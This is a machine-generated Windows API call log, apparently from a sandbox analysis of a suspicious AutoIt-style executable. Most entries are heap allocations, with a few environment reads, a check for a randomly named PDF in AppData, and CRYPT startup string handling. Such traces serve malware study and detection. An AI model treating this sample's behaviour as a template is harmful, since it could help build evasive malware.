Size=0x20) returned 0x2e79310 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0230.079] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0230.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50668 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0230.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0230.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0230.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0230.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0230.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0230.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.251] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EQBMxAkSv-.pdf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd49fe790, ftCreationTime.dwHighDateTime=0x1d5ee3e, ftLastAccessTime.dwLowDateTime=0xd494fa00, ftLastAccessTime.dwHighDateTime=0x1d5e97b, ftLastWriteTime.dwLowDateTime=0xd494fa00, ftLastWriteTime.dwHighDateTime=0x1d5e97b, nFileSizeHigh=0x0, nFileSizeLow=0xd640, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="EQBMxAkSv-.pdf", cAlternateFileName="EQBMXA~1.PDF")) returned 0xa87110 [0230.251] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0230.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.252] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0230.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0230.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0230.253] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0230.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0230.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0230.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0230.254] 